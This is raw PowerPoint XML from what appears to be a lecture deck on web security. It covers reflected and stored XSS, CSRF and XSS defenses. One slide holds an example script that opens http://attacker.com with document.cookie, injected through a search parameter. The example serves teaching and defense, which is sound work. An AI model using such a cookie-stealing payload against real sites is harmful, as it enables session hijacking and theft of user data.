              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)  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8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Reflected XSS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0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762000" y="2667000"/>
            <a:ext cx="8116137" cy="3810000"/>
            <a:chOff x="762000" y="2514600"/>
            <a:chExt cx="8116137" cy="3810000"/>
          </a:xfrm>
        </p:grpSpPr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762000" y="5257800"/>
              <a:ext cx="4648200" cy="1066800"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln>
              <a:headEnd/>
              <a:tailEnd type="triangle" w="lg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/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Rectangle 19"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5622174" y="2514600"/>
              <a:ext cx="3255963" cy="295275"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln>
              <a:headEnd/>
              <a:tailEnd type="triangle" w="lg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/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 18" descr="toshiba_satellite_a105_s4284_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1436688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CompaqAlphaServerES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598988"/>
            <a:ext cx="11557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DS15server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4188" y="1135062"/>
            <a:ext cx="2436812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943600" y="754062"/>
            <a:ext cx="1693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660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attack Server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773863" y="4171950"/>
            <a:ext cx="176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660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Victim Server </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="Straight Arrow Connector 17"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2046288" y="1475581"/>
            <a:ext cx="3363912" cy="43418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 type="arrow" w="med" len="med"/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="21119711">
            <a:off x="2709070" y="1251971"/>
            <a:ext cx="2192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40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user gets bad link</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15" name="Straight Arrow Connector 25"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2133600" y="2895600"/>
            <a:ext cx="4572000" cy="1447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6" name="TextBox 26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1101636">
            <a:off x="3044825" y="3138488"/>
            <a:ext cx="2570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40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user clicks on link</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="3300413" y="3817938"/>
            <a:ext cx="3000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40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>victim echoes user input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="18" name="Straight Arrow Connector 34"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1752600" y="3257550"/>
            <a:ext cx="5021263" cy="16192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20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4514850"/>
            <a:ext cx="53340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/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="2"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B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>www.victim.com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33900" y="2057400"/>
            <a:ext cx="44577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/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="2">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>www.evil.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="B7C1EB"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 25"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="4819650"/>
            <a:ext cx="5334000" cy="1962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marL="0" lvl="2"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&lt;html&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="2"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Results for </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="2"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  &lt;script&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="2"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err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>window.open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>attacker.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="2"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  ... </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ...) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="2"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  &lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="2"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&lt;/html&gt;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33900" y="2362200"/>
            <a:ext cx="4457700" cy="64611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http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>victim.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>search.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>? </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200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term= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;script&gt; ... &lt;/script&gt;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2897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Stored XSS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 18" descr="toshiba_satellite_a105_s4284_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01913"/>
            <a:ext cx="1436688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CompaqAlphaServerES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9475" y="4979988"/>
            <a:ext cx="11557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S15server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4188" y="1905000"/>
            <a:ext cx="2436812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43600" y="1524000"/>
            <a:ext cx="1693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660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attack Server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562600" y="4552950"/>
            <a:ext cx="1760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660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Server Victim </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Straight Arrow Connector 17"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="5576887" y="3652838"/>
            <a:ext cx="1801813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28600" y="3886200"/>
            <a:ext cx="1465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660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>User Victim</a:t>
            </a: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6781800" y="3276600"/>
            <a:ext cx="1720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40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Inject malicious script</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="Straight Arrow Connector 25"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2274888" y="3962400"/>
            <a:ext cx="2830512" cy="990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" name="TextBox 26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="3036888" y="4067175"/>
            <a:ext cx="2141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40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>request content</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="2311400" y="4568825"/>
            <a:ext cx="2932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40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>receive malicious script</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Oval 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6750050" y="2865438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40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a: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 rot="1039646">
            <a:off x="2713038" y="3703638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40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a: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 rot="1068865">
            <a:off x="2084388" y="408622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40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="18" name="Straight Arrow Connector 34"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1752600" y="4324350"/>
            <a:ext cx="3352800" cy="11620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19" name="Straight Arrow Connector 36"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2198688" y="2205038"/>
            <a:ext cx="3211512" cy="6873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" name="TextBox 37"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-709076">
            <a:off x="2759075" y="2060575"/>
            <a:ext cx="2301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40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>steal valuable data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Oval 38"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-713606">
            <a:off x="2438400" y="235902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40458C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215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Stored XSS attack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loaded images</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTML attributes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>user content (comments, blog posts)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3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XSS attacks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4572000" cy="14851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95591"/>
            <a:ext cx="2441443" cy="2441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760" y="1524001"/>
            <a:ext cx="2987040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4" y="4135826"/>
            <a:ext cx="4953014" cy="240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7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XSS Defenses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Parameter Validation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTTP-Only Cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Dynamic Data Tainting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Static Analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Script Sandboxing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57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Vulnerability Occurrence in Applications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76200" y="1551708"/>
            <a:ext cx="7924800" cy="4940531"/>
            <a:chOff x="76200" y="1551708"/>
            <a:chExt cx="7924800" cy="4940531"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="Content Placeholder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800" b="61092"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="76200" y="2405959"/>
              <a:ext cx="7924800" cy="786128"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="6" name="Content Placeholder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61" b="78028"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="76200" y="1551708"/>
              <a:ext cx="7924800" cy="854251"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="15" name="Content Placeholder 3"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId2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052" b="43200"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="76200" y="3200400"/>
              <a:ext cx="7924800" cy="1720735"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="16" name="Content Placeholder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286" b="27209"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="76200" y="4887883"/>
              <a:ext cx="7924800" cy="160435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6705600" y="5257800"/>
            <a:ext cx="1614024" cy="1066606"/>
            <a:chOff x="6477000" y="3028927"/>
            <a:chExt cx="1614024" cy="1066606"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="8" name="Group 7"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6477000" y="3124200"/>
              <a:ext cx="801244" cy="876060"/>
              <a:chOff x="7675224" y="3423138"/>
              <a:chExt cx="291673" cy="344660"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="12" name="Content Placeholder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18" t="14740" r="70725" b="83818"/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="7675951" y="3423138"/>
                <a:ext cx="290946" cy="70338"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="13" name="Content Placeholder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37" t="17034" r="70306" b="81524"/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="7675951" y="3560299"/>
                <a:ext cx="290946" cy="70338"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="14" name="Content Placeholder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07" t="19263" r="70236" b="79295"/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="7675224" y="3697460"/>
                <a:ext cx="290946" cy="70338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7393396" y="3028927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2013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93397" y="3377564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2014</a:t>
              </a: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91400" y="3726201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2015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748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Cross-Site Request Forgery (CSRF)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 18" descr="toshiba_satellite_a105_s4284_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787" y="3103563"/>
            <a:ext cx="1436688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CompaqAlphaServerES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1725" y="2084388"/>
            <a:ext cx="11557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S15server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4187" y="5402263"/>
            <a:ext cx="243681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43600" y="5021263"/>
            <a:ext cx="16938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660066"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Attack Server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784850" y="1657350"/>
            <a:ext cx="176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660066"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Server Victim </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Straight Arrow Connector 17"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2657475" y="2486025"/>
            <a:ext cx="2830512" cy="6175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11187" y="4476750"/>
            <a:ext cx="1465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660066"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>User Victim</a:t>
            </a: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 rot="-709076">
            <a:off x="2994025" y="2298700"/>
            <a:ext cx="2068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40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>establish session</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="Straight Arrow Connector 20"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="2058987" y="4800600"/>
            <a:ext cx="2906713" cy="1066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" name="TextBox 24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-743562">
            <a:off x="2886075" y="3014663"/>
            <a:ext cx="2449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40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>send forged request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Straight Arrow Connector 25"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2505075" y="4191000"/>
            <a:ext cx="2830512" cy="990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5" name="TextBox 26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="3241675" y="4527550"/>
            <a:ext cx="3076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40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>visit server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>(or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="2427287" y="4930775"/>
            <a:ext cx="2932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rgbClr val="40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>receive malicious page</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Oval 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2608262" y="253047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40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Oval 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2989262" y="396240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40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Oval 32"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1068865">
            <a:off x="2182812" y="438785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40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="Straight Arrow Connector 23"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2668587" y="3192463"/>
            <a:ext cx="2830513" cy="6175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" name="Oval 27"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2439987" y="335280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40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-743562">
            <a:off x="4252912" y="3325813"/>
            <a:ext cx="12128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40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>(w/ cookie)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="49653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Vulnerabilities </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>by Year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8" y="1524000"/>
            <a:ext cx="8307382" cy="4800600"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="14" name="Group 13"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1066800" y="1795780"/>
            <a:ext cx="1508760" cy="1402080"/>
            <a:chOff x="838200" y="2895600"/>
            <a:chExt cx="1508760" cy="1402080"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
